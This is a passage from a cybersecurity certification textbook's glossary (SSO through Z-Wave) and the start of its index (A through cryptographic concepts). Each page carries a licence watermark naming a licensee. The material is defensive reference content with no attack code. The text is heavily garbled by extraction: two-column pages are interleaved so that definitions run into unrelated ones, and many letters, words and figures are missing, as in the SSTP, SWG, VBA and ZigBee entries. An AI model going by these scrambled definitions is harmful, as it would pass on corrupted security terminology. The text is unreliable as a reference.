under extreme load.
SSO (single sign-on) An authentication
supplicant In A architecture, the device
technology that enables a user
requesting access to the network.
to authenticate once and receive
authorizations for multiple services. SWG (secure web gateway) An appliance
or proxy server that mediates client
SSTP (Secure Socket Tunneling
connections with the Internet by filtering
Protocol) A protocol that uses the TT
spam and malware and enforcing access
over SSL protocol and encapsulates an IP
restrictions on types of sites visited, time
packet with a PPP header and then with
spent, and bandwidth consumed.
an SSTP header.
symmetric encryption A two-way
standard naming convention Applying
encryption scheme in which encryption
consistent names and labels to assets
and decryption are both performed by
and digital resources identities within a
the same key. Also known as shared-key
configuration management system.
encryption.
stapling Mechanism used to mitigate
syslog A protocol enabling di erent
performance and privacy issues when
appliances and software applications to
re uesting certificate status from an C
transmit logs or event records to a central
responder.
server.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 G-24 | Glossary

TACACS+ (Terminal Access Controller threat hunting Cybersecurity technique

Access Control System Plus) An AAA
protocol developed by Cisco that is often
used to authenticate to administrator
accounts for network appliance
management.
tail command Linux utility for showing
the last lines in a file.
tailgating Social engineering technique
to gain access to a building by following
someone who is unaware of their
presence.
TAP (test access port) A hardware device
inserted into a cable to copy frames for
analysis.
tape Tape media provides robust, high
speed, high capacity backup storage. Tape
drives and autoloader libraries can be
connected to the SATA and SAS buses or
accessed via a SAN.
TAXII (Trusted Automated eXchange
of Indicator Information) A protocol
for supplying codified information to
automate incident detection and analysis.
tcpdump command A command-line
packet sniffing utility.
tcpreplay command A command-line
utility that replays packets saved to a file
back through a network adapter.
technical control A category of security
control that is implemented as a system
hardware, software, or firmware .
Technical controls may also be described
as logical controls.
tethering Using the cellular data plan
of a mobile device to provide Internet
access to a laptop or PC. The PC can be
tethered to the mobile by , luetooth,
or Wi-Fi (a mobile hotspot). Also known as
hotspot.
theHarvester Utility for gathering results
from open source intelligence queries.
thin AP An access point that requires a
wireless controller in order to function.
third-party risks Vulnerabilities that
arise from dependencies in business
relationships with suppliers and
customers.
threat actor The person or entity
responsible for an event that has been
identified as a security incident or as a risk.
designed to detect presence of threats
that have not been discovered by normal
security monitoring.
threat map Animated map showing
threat sources in near real-time.
time of day restrictions Policies or
configuration settings that limit a user's
access to resources.
time o set In forensics, identifying
whether a time one o set has been
applied to a file's time stamp.
timeline In digital forensics, a tool that
shows the se uence of file system events
within a source image in a graphical
format.
TKIP (Temporal Key Integrity Protocol)
A mechanism used in the first version of
WPA to improve the security of wireless
encryption mechanisms, compared to the
awed standard.
TLS (Transport Layer Security) A
security protocol that uses certificates for
authentication and encryption to protect
web communication.
TOCTTOU (time of check to time of use)
The potential vulnerability that occurs
when there is a change between when an
app checked a resource and when the app
used the resource.
token A physical or virtual item
that contains authentication and or
authori ation data, commonly used in
multifactor authentication.
tokenization A deidentification method
where a unique token is substituted for
real data.
TOTP (Time-based One-time Password)
An improvement on T that forces
one-time passwords to expire after a
short period of time.
TPM (Trusted Platform Module) A
specification for hardware based storage
of digital certificates, keys, hashed
passwords, and other user and platform
identification information. transit
gateway In cloud computing, a virtual
router deployed to facilitate connections
between VPC subnets and VPN gateways.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Glossary | G-25

trend analysis The process of detecting VDI (virtual desktop infrastructure)

patterns within a dataset over time, and A virtualization implementation that
using those patterns to make predictions separates the personal computing
about future events or better understand environment from a user's physical
past events. computer.
Trojan A malicious software program vendor management Policies and
hidden within an innocuous-seeming procedures to identify vulnerabilities and
piece of software. sually, the Tro an is ensure security of the supply chain.
used to try to compromise the security
virus Code designed to infect computer
of the target computer. Also known as
files or disks when it is activated.
Trojan.
vishing A human-based attack where
TTP (tactics, techniques, and
the attacker extracts information while
procedures) Analysis of historical cyber-
speaking over the phone or leveraging IP-
attacks and adversary actions.
based voice messaging services (VoIP).
typosquatting An attack—also called
VLAN (virtual local area network) A
typosquatting—in which an attacker
logically separate network, created by
registers a domain name with a common
using switching technology. Even though
misspelling of an e isting domain, so that
hosts on two VLANs may be physically
a user who misspells a URL they enter
connected to the same cabling, local
into a browser is taken to the attacker's
traffic is isolated to each LAN so they
website. Also known as URL hijacking.
must use a router to communicate.
UEBA (user and entity behavior
VM escaping (virtual machine escaping)
analytics) A system that can provide
An attack where malware running in a
automated identification of suspicious
VM is able to interact directly with the
activity by user accounts and computer
hypervisor or host kernel.
hosts.
VM sprawl (virtual machine sprawl)
unified endpoint mana ement
Configuration vulnerability where
Enterprise software for controlling device
provisioning and deprovisioning of virtual
settings, apps, and corporate data storage
assets is not properly authorized and
on all types of fi ed, mobile, and IoT
monitored.
computing devices.
VPC (virtual private cloud) A private
USB data blocker (Universal Serial Bus
network segment made available to a
data blocker) ardware plug to prevent
single cloud consumer on a public cloud.
malicious data transfer when a device is
plugged into a USB charging point. VPN (virtual private network) A secure
tunnel created between two endpoints
T unified threat mana ement
connected via an unsecure network
All-in-one security appliances and
(typically the Internet).
agents that combine the functions of
a firewall, malware scanner, intrusion vulnerability A weakness that could
detection, vulnerability scanner, data loss be triggered accidentally or exploited
prevention, content filtering, and so on. intentionally to cause a security breach.
vault A secure room with walls and vulnerability assessment An evaluation
gateway hardened against physical of a system's security and ability to meet
assault. compliance requirements based on the
configuration state of the system, as
VBA (Visual Basic for Applications)
represented by information collected
Programming languages used to
from the system.
implement macros and scripting in ffice
document automation. A e application fire all A firewall
designed specifically to protect software
VDE (virtual desktop environment) The
running on web servers and their backend
user desktop and software applications
databases from code injection and DoS
provisioned as an instance under VDI.
attacks.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 G-26 | Glossary

war driving The practice of using a Wi-Fi
sni er to detect LANs and then either
making use of them if they are open
unsecured) or trying to break into them
(using WEP and WPA cracking tools).
warm site A location that is dormant
or performs noncritical functions under
normal conditions, but which can be
rapidly converted to a key operations site
if needed.
watering hole attack An attack in which
an attacker targets specific groups or
organi ations, discovers which websites
they fre uent, and in ects malicious code
into those sites.
WEP (Wired Equivalent Privacy) A legacy
mechanism for encrypting data sent over
a wireless connection.
whaling An email-based or web-based
form of phishing which targets senior
executives or wealthy individuals.
white team ta administering,
evaluating, and supervising a penetration
test or incident response exercise.
WinHex Forensics tool for Windows that
allows collection and inspection of binary
code in disk and memory images.
worm A type of malware that replicates
in system memory and can spread over
network connections rather than infecting
files.
WPA (Wi-Fi Protected Access) Standards
for authenticating and encrypting access
to i i networks. Also known as A ,
WPA3.
WPS (Wi-Fi Protected Setup) A feature
of WPA and WPA2 that allows enrollment
in a wireless network based on an 8-digit
PIN.
XaaS (anything as a service) Expressing
the concept that most types of IT
requirements can be deployed as a cloud
service model.
XML injection Attack method where
malicious XML is passed as input to
exploit a vulnerability in the target app.
XOR (exclusive OR) An operation that
outputs to true only if one input is true
and the other input is false.
XSRF (cross-site request forgery) A
malicious script hosted on the attacker's
site that can exploit a session started on
another site in the same browser. Also
known as client-side request forgery or
CSRF.
XSS (cross-site scripting) A malicious
script hosted on the attacker's site or
coded in a link injected onto a trusted
site designed to compromise clients
browsing the trusted site, circumventing
the browser's security model of trusted
zones.
zero trust Security design paradigm
where any request (host-to-host
or container-to-container) must be
authenticated before being allowed.
zero-day A vulnerability in software that is
unpatched by the developer or an attack
that exploits such a vulnerability.
ero fill A method of sanitizing a drive by
setting all bits to zero.
ZigBee Low-power wireless
communications open source protocol
used primarily for home automation.
ig ee uses radio fre uencies in the .
band and a mesh topology.
Z-Wave Low-power wireless
communications protocol used primarily
for home automation. Z-Wave uses radio
fre uencies in the high to low
M and a mesh topology.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Index
Page numbers with Italics represent charts, graphs, and diagrams.
A account lockout and
A/A (active/active) clustering, 251
AAA. see authentication,
authorization, and accounting
(AAA)
ABAC (attribute-based access
control), 201
abnormal process behavior
analysis, 90-91
academic journals, threat
research sources, 28
acceptable use policy (AUP), 208
access, network
architecture, 217
access control entry (ACE),
200-201
access control lists (ACL)
egress traffic filtering, 256
firewall rulesets, 262-263
ingress traffic filtering, 256
reverse proxy servers,
262-263
top-to-bottom processing,
262-263
access points, 235, 469
access policies, 191-192
account attributes, 191
account audits, 194
account expiration, 197
accounting
identity and access
management (IAM), 148-149
physical access controls, 540
account lockout and
disablement, 196-197
account management controls.
see identity and account
management controls
account permissions, 195
account policies
access policies, 191-192
account attributes, 191
account audits, 194
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
disablement, 196-197
account password policy
settings, 192-193
account permissions, 195
account restrictions, 193-194
system-enforced account
policies, 192-193
usage audits, 195-196
account restrictions
geolocation, 193
location-based policies, 193
time-based restrictions
impossible travel time/
risky login policy, 194
time-based login policy,
193-194
time of day policy, 193
ACE (access control entry),
200-201
ACI (adjacent channel
interference), 236
ACL. see access control lists (ACL)
Acronis Backup, 523, 525
actions on objectives, pen test
attack life cycle, 70
active (intrusive) vulnerability
scanner, 60
active/active (A/A) clustering, 251
active defenses, 534-535
active/passive (A/P)
clustering, 251
active reconnaissance
drones/unmanned aerial
vehicle (UAV), 69-70
footprinting, 69
Open Source Intelligence
(OSINT), 69
social engineering, 69
war driving, 69
Additional Data (AEAD)
mode, 109
Address Resolution Protocol
(ARP)
poisoning attacks, 228
routing and switching
protocols, 218-219
Address Resolution Protocol
(ARP) cache, 37
ad hoc network, 357
adjacent channel interference
(ACI), 236
administrator credential
policies, 185
administrator/root accounts
administrator credential
policies, 185
default security groups, 185
generic administrator
account management, 185
admissibility in digital
forensics, 484
Adobe
rights management
services, 450
software vulnerabilities, 50
Advanced Encryption Standard
(AES), 100, 237
Advanced Forensic Format
(AFF), 493
advanced persistent threat (APT)
defined, 20-21
fileless malware, 85
advanced volatile threat (AVT),
fileless malware, 85
adversarial artificial
intelligence, 480
adware, 85
AEAD (Additional Data)
mode, 109
AES (Advanced Encryption
Standard), 100
AES (Advanced Encryption
Standard) cipher, 237
AES Galois Counter Mode
Protocol (GCMP), 238
aggregation/banding
technique, 452
 I-2 | Index

agile development software anomaly-based detection, 271 application-based firewalls, 260

development life cycle (SDLC), Anonymous, 20 application clustering, 251
400, 401-403 Ansible cloud orchestration application development,
AH (Authentication Header), 305 platform, 430 deployment, and
AI. see artificial intelligence (AI) anti-forensics, 492-493 automation, 399
AICPA, 11-12 anti-malware software application firewall, 260
air gap (system isolation), 475 endpoint protection, 327 application layer (OSI Layer 7),
air gaped host, 548-549 threat intelligence 258, 425
AirWatch, 345 sources, 25 application log files
AIS (Automated Indicator anti-virus response, 329 DNS event logs, 470
Service), 30 anti-virus software (A-V) dump files, 471
alarm systems and sensors, endpoint protection, 327 VoIP, call managers, SIP
543-544 malware, 90 traffic, 471
allow list, 393 anything as a service (Xaas), web/HTTP access logs, 470
Alternate Data Streams 409-410 application management,
(ADS), 495 A/P (active/passive) 352-353
Always-on VPN, 308-309 clustering, 251 application programming
Amazon Apache, penetration testing, 70 interfaces (APIs)
App store, 346 APIs. see application attacks, 374
Elastic Compute Cloud, programming interfaces (APIs) CASB (cloud access security
409, 410 Apple broker), 427
Web Services (AWS) Apple Pay, 360 cloud security controls, 419
Lambda, 41 Business Manager, 352 identity and account
Pacu exploitation GoTo bug, 385 management controls, 187
framework, 46 iOS inspection and integrations,
PrivateLink, 424 data encryption, 350 420-421
security credentials, 188 enterprise mobility northbound, 432
security group management, 346 Representational State
management, 425-426 jailbreaking, 353-354 Transfer (REST), 430
American Institute of Certified macOS secure application protocols,
Public Accountants (AICPA), DarkMatter, 88 294-295
11-12 QuarkMatter, 88 service integration, 430
amplification attack, 247-248 Push Notification Service, 361 Simple Object Access
analysis phase, 465-466 appliance firewall, bridged Protocol (SOAP), 430
Android (layer 2) and routed (layer 3), 259 southbound, 432
Beam, 359 application allow and block lists, application security, 419
data encryption, 350 478-479 application servers, 13
enterprise mobility application scanners, 59 application virtualization,
management (EMM), 346-348 application attack, indicators 413-414
Enterprise program, 346 DLL injection, 369 AppLocker, 394
locking down connectivity driver manipulation, 369 APT (advanced persistent
methods, 357 memory leak, 368-369 threat), 85
Obad Android Trojan null pointer dereference, 368 arbitrary code execution, 366
malware, 359 overflow vulnerabilities, Arduino, 332
rooting, 353-354 367-368 Argus, 473
USB connection pass the hash (PtH) attack, ARP (Address Resolution
methods, 360 369-370 Protocol), 37, 218-219, 228
annualized rate of occurrence privilege escalation, 366-367 artifacts and data recovery, 495
(ARO), 503 race conditions, 368 artificial intelligence (AI)
annual loss expectancy resource exhaustion, 368-369 adversarial, 480
(ALE), 503 secure network designs, 247 cyber threat intelligence
anomaly analysis, 90 application aware firewalls, 258 (CTI), 26

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

physical site security
controls, 545
threat intelligence sources
artificial neural network
(ANN), 31
machine learning (ML)
techniques, 31
predictive analysis, 31
artificial neural network
(ANN), 31
ASCII characters, 373
asset allocation, onboarding
policies, 181
asset identification, 531
asset management
asset identification
and standard naming
conventions, 531
internet protocol (IP)
schema, 531
IP address management
(IPAM), 531
asset redundancy, 510
asset types, 510
asymmetric encryption
cryptographic concepts, 96
elliptic curve cryptography
(ECC)
Digital Signature
Algorithm (DSA), 105
public key cryptography
algorithms, 102
public and private key pairs,
100-101
public key cryptography
algorithms
cryptographic concepts,
101-102
RSA algorithm, 101,
104-105
trapdoor function, 101
asynchronous replication, 520
AT&T Security, open source
intelligence (OSINT), 27
attack life cycle, penetration
testing, 70
attack profile, black, gray, and
white box, 68
attack surface, 22-23
attack vectors
cloud services, 23
direct access, 22
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
email, 23
remote access, 23
removable media, 22-23
social media sites, 23
supply chain, 23
web, 23
wireless access points
(WAP), 23
attestation, identity provider
(IdP), 203-204
attribute-based access control
(ABAC), 201
attributes, of authentication
design concepts, 152
auditing cloud security, 418-419
AUP (acceptable use policy), 208
authenticated encryption, 109
authentication
cryptographic use cases,
111-112
identity and access
management (IAM), 148-149
authentication, authorization,
and accounting (AAA)
enterprise/IEEE 802.1X
authentication, 240
identity and access
management (IAM), 149
authentication attributes, 152
authentication controls
authentication design
concepts
attributes of, 152
authentication
design, 151
authentication factors,
150-151
identity and access
management (IAM),
148-149
multifactor authentication
(MFA), 151
authentication technology
extensible authentication
Protocol (EAP), 165-166
IEEE 802.1x port-based
NAC (PNAC), 166
key management devices,
164-165
open authentication,
168-169
Index | I-3
remote authentication
dial-in user service
(RADIUS), 166-167
smart-card
authentication, 164
terminal access controller
access-control system
(TACACS+), 167
token keys and static
codes, 167-168
two-step verification, 170
biometric authentication
concepts
behavioral technologies,
174-175
establishing, 172-173
facial recognition, 174
fingerprint
recognition, 173
bluetooth connection
methods, 358
implementation
guidelines, 177
knowledge-based
authentication
authentication
management, 161-162
brute force attacks, 160
Challenge Handshake
Authentication Protocol
(CHAP), 158
dictionary attacks, 160
hybrid password
attacks, 160
Kerberos authentication,
155-156
Kerberos authorization,
156-157
local authentication, 154
MS-CHAP, 158
network authentication,
154
password attacks, 159-160
Password Authentication
Protocol (PAP), 157-158
password crackers, 161
passwords, resetting, 154
personal identification
number (PIN), 154
rainbow table attacks, 160
remote authentication, 154
Index
 I-4 | Index
Windows authentication,
154-155
physical access controls, 540
authentication design,
confidentiality, integrity,
availability (CIA) triad, 151
authentication design concepts
attributes of, 152
authentication design, 151
authentication factors,
150-151
identity and access
management (IAM), 148-149
multifactor authentication
(MFA), 151
authentication factors
logon factors, 150
ownership factor, 150-151
Something You Are
Authentication, 151
Something You Do
Authentication, 151
Something You Have
Authentication, 150-151
Something You Know
Authentication, 150
Authentication Header (AH), 305
authentication logs, 470
authentication management,
161-162
authentication provider, 154
Authentication Service, Kerberos
authentication, 155-156
authentication technology
extensible authentication
Protocol (EAP), 165-166
IEEE 802.1x port-based NAC
(PNAC), 166
key management devices,
164-165
open authentication, 168-169
remote authentication dial-
in user service (RADIUS),
166-167
smart-card authentication,
164
terminal access controller
access-control system
(TACACS+), 167
token keys and static codes,
167-168
two-step verification, 170
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
authorization AWS (Amazon Web Services),
creep, 195 46, 188
identity and access
management (IAM), 148-149 B
authorization solutions
backdoors, 86-87
attribute-based access
background checks, 181
control (ABAC), 201
backup media types
directory services, 202-203
cloud backups, 527
discretionary access control
digital tape systems, 527
(DAC), 199
disk, 527
federation and attestation,
network attached storage
203-204
(NAS), 527
file system permissions,
storage area networks
200-201
(SANs), 527
mandatory access control
backup power generator, 517
(MAC), 201
backups and retention policy,
Open Authorization (OAuth)
522-523
protocols, 205-206
backup storage issues, 526
Open ID Connect (OIDC), 206
backup strategies
physical access controls, 540
backup media types, 526-527
role-based access control
backups and retention policy,
(RBAC), 199
522-523
rule-based access control,
backup storage issues, 526
201-202
copy backups, 525
security assertions markup
differential backups, 524-525
language (SAML), 204-205
full backups, 524
Automated Indicator Service
incremental backups, 524-525
(AIS), threat data feeds, 30
non-persistence
automated vulnerability
environment, 528
scanning
order of restoration, 527-528
patch management, 326-327
snapshots and images,
vulnerability feed, 59
525-526
automation concepts, 399
BadUSB, 321
automation courses of action,
bandwidth monitor, 473
402-403
“bare metal” hypervisor, 412
automation/scripting release
Barracuda firewall, 266, 419
paradigms
barricades security, 541
automation courses of
baseband radio, 333
action, 402-403
baseline configuration and
continuous delivery, 402
registry setting, 326, 530-531
continuous deployment, 402
batter backups, 517
continuous integration
behavioral-based
(CI), 402
authentication, 152
continuous monitoring,
behavioral-based detection, 271
402-403
behavioral technologies
continuous validation, 403
gait analysis, 175
Autopsy, 487, 491, 495
signature recognition, 175
A-V (anti-virus software), 90
voice recognition, 175
availability loss, impact of, 53
behavioral threat research,
avoidance, of risks, 504
threat intelligence providers, 26
AVT (advanced volatile threat), 85
benchmarks, for cybersecurity, 12

Berkeley Internet Name Domain
(BIND), 287
BGP (Border Gateway
Protocol), 219
binary packages, 386
binary Python process, 392
binary shellcode, 395
BIND (Berkeley Internet Name
Domain), 287
biometric authentication
concepts
behavioral technologies,
174-175
Crossover Error Rate (CER),
172-173
establishing, 172-173
facial recognition, 174
Failure to Enroll Rate (FER), 173
False Acceptance Rate
(FAR), 172
False Rejection Rate (FRR), 172
fingerprint recognition, 173
vascular biometrics, 173
vein matching scanners, 173
biometric factor, 151
biometric identification, 175
biometric locks, 542
birthday attacks, cryptographic
attacks, 117-118
BitLocker, 321
black box, 68
black hat hacker, 20
black hole, 475
blackouts, 517
blockchain, 121
blockchain-based IAM, 534
block ciphers, 100
block list, 393
BlueBorne exploit, 358
Blue Coat, 426
bluejacking, 359
bluesnarfing, 359
blue team, penetration testing,
68-69
bluetooth connection methods,
358-359
boot attestation, 320
boot integrity, 319-320
boot virus, 83
Border Gateway Protocol
(BGP), 219
botnets
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
cryptojacking, 89
remote access Trojans (RATs),
86-87
static known treats, 19
bots, remote access Trojans
(RATs), 86-87
Bourne Again Shell (Bash)
malicious indicators, 396
BPDU (Bridge Protocol Data
Unit) Guard, 230
branching statements
Python, 392
scripting, 390
bridged appliance firewall, 259
Bridge Protocol Data Unit
(BPDU) Guard, 230
Bring Your Own Device
(BYOD), 344
bring-your-own-device (BYOD)
call detail records (CDRs), 472
evidence acquisition, 490
Bro (Zeek Network Monitor),
60, 268
brownouts, 517
Browser Exploitation
frameworks (BeEF), 397
browser exploitation
frameworks, exploitation
frameworks, 46
brute force attacks, 160, 239
buffer overflow, 367
bug bounty, 20, 30, 68
building automation systems
(BAS), 336
bulk data encryption, 112
bulk encryption, 105-106
burning documents, 552
business continuity plan (BCP),
463, 508
business impact analysis (BIA)
business continuity plan
(BCP), 508
continuity of operation
planning (COOP), 508
defined, 508
disaster recovery plans
(DRPs), 512
disasters, 511
functional recovery plans, 512
identification of critical
systems, 510
Index | I-5
mean time between failures
(MTBF), 510
mean time to failure
(MTTF), 510
mean time to repair
(MTTR), 511
mission essential functions
(MEF), 508-510
risk management process, 500
single points of failure (SPoF),
510-511
site risk assessment, 511
see also risk management
business partnership agreement
(BPA), 323
business process analysis
(BPA), 510
business risk management
cybersecurity assurance, 8-10
information assurance, 8-10
business workflows, network
architecture, 217
BYOD. see Bring Your Own
Device (BYOD)
C
C2. see command and control
(C2)
CA. see certificate authority (CA)
cable locks, 543
Cache Control, 385
cache data acquisition, 495
caching engines, 261
Caesarian cipher, 98
California Consumer Privacy Act
(CCPA), 14
call detail records (CDRs), 472
call list, 458
call managers, 471
Cambium Networks Wi-Fi
Inspector, 244
camera/microphone
enforcement, 351
camera security, 544-545
CAN buses, 338
canonicalization attack, 379
capabilities, of threat actors, 19
captive portals, 239-240
capture the flag (CTF), 210-211
card cloning, 543
card verification value (CVV), 442
Index
 I-6 | Index

carving, files, 495
CASB (cloud access security
broker), 272
cat command, 278
CBC. see cipher block chaining
(CBC) mode
CBC (cipher block chaining)
mode, 108
CBT (computer-based
training), 211
CCI (co-channel interference), 236
CCMP. see cipher block chaining
(CBC) mode
CCMP (Cipher Block Chaining
Message Authentication Code
Protocol), 237
cellular data connections,
356-357
cellular network, embedded
systems, 333
Center for Internet Security (CIS)
benchmarks, 12-13
centralized key management,
137
CER (Crossover Error Rate),
172-173
CERT. see computer emergency
response team (CERT)
certificate and key management
certificate expiration, 138
certificate formats
Distinguished Encoding
Rules (DER), 140
file extensions, 141
P7B format, 141
PKCS #12 format, 141
Privacy-enhanced
Electronic Mail (PEM), 140
issues with, 143
life cycle of, 137. see also key
management
Online Certificate Status
Protocol (OCSP), 139-140
OpenSSL, 142
pinning, 140
revocation lists, 138-139
certificate attributes, 130
certificate authority (CA)
certificate signing request
(CSR), 128-129
defined, 126-127
Digicert, 127
digital certificates, 106, 126
GlobalSign, 127
GoDaddy, 127
hierarchical (Intermediate
CA), 127-128
IdentTrust, 127
online vs offline CAs, 128
registration authorities (RAs),
128-129
Sectigo/Comodo, 127
single CA, 127
Transport Layer Security
(TLS), 292
trust model, 127
certificate-based tunneling, 240
certificate chaining, 127-128
certificate formats
encoding
Distinguished Encoding
Rules (DER), 140
Privacy-enhanced
Electronic Mail (PEM), 140
file extensions, 141
P7B format, 141
PKCS #12 format, 141
certificate policies, 132
certificates, update or revoke, 478
certificates and smart cards, 180
certificate signing request (CSR),
128-129, 142
chain of custody, 485
chain of trust, 127
Challenge Handshake
Authentication Protocol (CHAP),
158, 304
change control, 530, 532
change management, 530, 532
CHAP (Challenge Handshake
Authentication Protocol), 158, 304
checksum
digital signatures, 104-105
hashing algorithms, 97
integrity and resiliency of
data, 113
Chef cloud orchestration
platform, 430
Chief Information Security
Officer (CISO), roles and
responsibilities, 4
Chief Security Officer (CSO), 4
Chinese cyber espionage units, 20
choke firewall, 222
Choose Your Own Device
(CYOD), 344
chosen ciphertext attack, 109
Chuvakin, Anton, “Magic
Quadrant” reports, 328
CIA Triad. see confidentiality,
integrity, availability (CIA) triad
cipher, 96
cipher block chaining (CBC)
mode, 108
Cipher Block Chaining Message
Authentication Code Protocol
(CCMP), 237
cipher suites
cipher block chaining (CBC)
mode, 108
counter mode, 108
key exchange/agreement
algorithm, 108
signature algorithm, 108
Transport Layer Security
(TLS), 108, 293
ciphertext, 96
circuit-based alarm, 544
CIS benchmarks, 12-13
Cisco
Aironet series, 245
appliance firewall, 260
ASA, 266
Cloudlock, 426
digital forensics, 487
fog computing, 433
IP Flow Information Export
(IPFIX), 473
logs, 168
SAFE architecture, 216
CISO, 4
CIS-RAM. see Risk Assessment
Method (CIS-RAM)
Citrix
ICA, 413
XenApp, 413-414
XEN Server, 412
Citrix Endpoint Management, 345
clean agent fire suppression, 552
clean desk policy, 209
cleanup, pen test attack life
cycle, 70
clickjacking, 376
Client Authentication, 132
client-based errors (400
range), 470

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

closed circuit televisions (CCTV),
544-545
cloud access security brokers
(CASB), 272, 426-427
cloud backups, 527
cloud-based firewalls, 425
cloud-based versus on-premises
risks, 55
cloud compute security
API inspection and
integrations, 420-421
container security, 420
instance awareness, 421
cloud computing concepts. see
secure cloud solutions
cloud controls matrix, 11
cloud deployment models
community cloud, 408-409
hosted private cloud, 408
private cloud, 408
public (multi-tenant)
cloud, 408
cloud firewall security, 425
Cloudflare blog, Transport Layer
Security (TLS), 293
cloud networking security
public and private
subnets, 423
virtual private cloud (VPC),
423
cloud orchestration, 430
Cloud Security Alliance (CSA)
cloud controls matrix, 11
enterprise reference
architecture, 11
security guidance, 11
cloud security controls
application security, 419
cloud access security brokers
(CASB), 426-427
cloud compute security,
420-421
cloud firewall security, 425
cloud networking security, 423
cloud storage security, 421-422
data replication, 422-423
high availability (HA), 422-423
identity and access
management (IAM), 419-420
secrets management, 419-420
secure web gateway
(SWG), 427
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
security groups, 425-426
VPCs and transit
gateways, 424
cloud security integration and
auditing, 418-419
cloud service integration, 430
cloud service models
anything as a service (Xaas),
409-410
consultants, 411
geographical redundancy, 520
infrastructure as a service
(IaaS), 409, 410
Managed Security Services
Provider (MSSP), 411
platform as a service (PaaS),
409, 410
Security as a Service
(SECaaS), 411
software as a service
(SaaS), 409
cloud service provider (CSP)
Cloud Security Alliance
(CSA), 11
cloud security controls,
419-420
cloud security integration
and auditing, 418-419
public (multi-tenant)
cloud, 408
cloud services
as attack vectors, 23
digital forensics for, 496
cloud storage security
encryption, 421-422
permissions and resource
policies, 421
cloud versus on-premises
requirements, 204
clustering
active/active (A/A), 251
active/passive (A/P), 251
application, 251
virtual IP, 250
cmdlets, 395
CN (common name), 130-131
COBO. see Corporate Owned,
Business Only (COBO)
co-channel interference (CCI),
236
Code Integrity (CI) policies, 394
code of conduct, 208
Index | I-7
Code-Red worm, 84
code refactoring, 369
code reusage, 386
code review, 387
code signing, 88, 132, 393
code signing certificates, 135
cold site, 533
cold storage, 422
collisions, cryptographic attacks,
117-118
colocation cages, 548-549
command and control (C2)
penetration testing, 70
remote access Trojans
(RATs), 87
weaponization code, 460
command injection attack, 379
command-line interface (CLI), 419
command-line packet capture
utility, 42-43
command-line tools, topology
discovery (footprinting), 36-37
commercial threat intelligence
platforms, 26-27
common log format (CLF), 470
common name (CN), 130-131
common vulnerabilities and
exposures (CVE)
Common Vulnerabilities
Scoring System (CVSS), 59-60
Mitre, 30
network vulnerability tests
(NVTs), 59
plug-ins, 59
Security Content Application
Protocol (SCAP), 59
vulnerability feed, 59
Common Vulnerabilities Scoring
System (CVSS), 59-60
communication considerations
for embedded systems, 333-334
communication plan, incident
response (IR), 458
community cloud, 408-409
compensating controls, 10
competitors, treat actors, 21
compiled code, 387
computer-based training
(CBT), 211
computer emergency response
team (CERT), 21-22, 457, 458-459
Computer Security Act (1987), 13
Index
 I-8 | Index
computer security incident
response team (CSIRT), 457,
458-459
compute services, 420-421
conditional access, 201-202
conduct policy
acceptable use policy
(AUP), 208
clean desk policy, 209
code of conduct, 208
personally owned device
use, 209
social media analysis, 208
conferences, threat research
sources, 28
confidential (secret) data, 440
confidentiality, integrity,
availability (CIA) triad
authentication design, 151
information security roles, 2
privacy and data sensitivity
concepts, 438
Configuration Item (CI), 530
configuration management
system (CMS), 530-531
configuration review, 63
Conflicker worm, 84
constraints, embedded systems,
331-332
consultants, 411
consumer-specific, cross-sector
(horizontal) legislation, 13-14
contactless point-of-sale
(PoS), 360
containerization, content
management, 353
container security, 420
container virtualization, 413-414
containment phase, 456-457
content filter, 272
content filter configuration
changes
data loss prevention (DLP), 477
mobile device management
(MDM), 478
update or revoke
certificates, 478
content management, 353
Content Security Policy (CSP), 385
context-aware authentication, 349
continuity of operation planning
(COOP), 463, 508
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
continuous authentications, 175
continuous delivery, 402
continuous deployment, 402
continuous integration (CI), 402
continuous monitoring, 402-403
continuous validation, 403
control block, Python, 391-392
control diversity, 533-534
controller and access point
security, 236-237
control plane, 432
control risk, 505
cookies
malware classifications, 85
nonpersistent (session), 374
persistent (closed), 374
secure cookies, 384
Coordinated Universal Time
(UTC), 289, 486
COPE. see Corporate Owned,
Personally-Enabled (COPE)
copy backups, 525
Corporate Owned, Business
Only (COBO), 344
Corporate Owned, Personally-
Enabled (COPE), 344
corrective control, 9, 10
correlation rules, 466
counterfeit card reader, 543
counterintelligence, 487-488
counter mode, 108
cousin domains, 79
covert channel, remote access
Trojans (RATs), 87
crash dump, 492
Create-Thread, 395
credential databases, 77
credential dumping, 394
credentialed scans, 61
credential harvesting, 82
credential management, policies
for personnel, 183
credential stealing, 381
criminal syndicates, treat
actors, 21
critical (top secret) data, 440
critical systems, identification
of, 510
cross-certification, 128
Crossover Error Rate (CER),
172-173
cross-site request forgery
(XSRF)/(CSRF), 375-376
cross-site scripting (XSS) attacks,
376-377
cryptanalysis, 96
cryptoanalysis, 116
cryptocurrency mining, 89
crypto diversity, 534
crypto erase, 554
cryptographic attacks
birthday attacks, 117-118
collisions, 117-118
downgrade attacks, 116-117
key stretching, 117
man-in-the-middle attack
(MitM), 116-117
salting, 117
cryptographic ciphers
elliptic curve cryptography
(ECC), 102
encryption ciphers and
keys, 98
hashing algorithms
checksum, 97-98
digital signatures, 104-105
cryptographic concepts
asymmetric cipher, 96,
100-102
cipher, 96
ciphertext, 96
cryptanalysis, 96
defined, 96
modes of operations
Additional Data (AEAD)
mode, 109
authenticated
encryption, 109
chosen ciphertext
attack, 109
cipher suites, 108
digital certificates, 106
digital envelopes and key
exchange, 105-106
digital signatures, 104-105
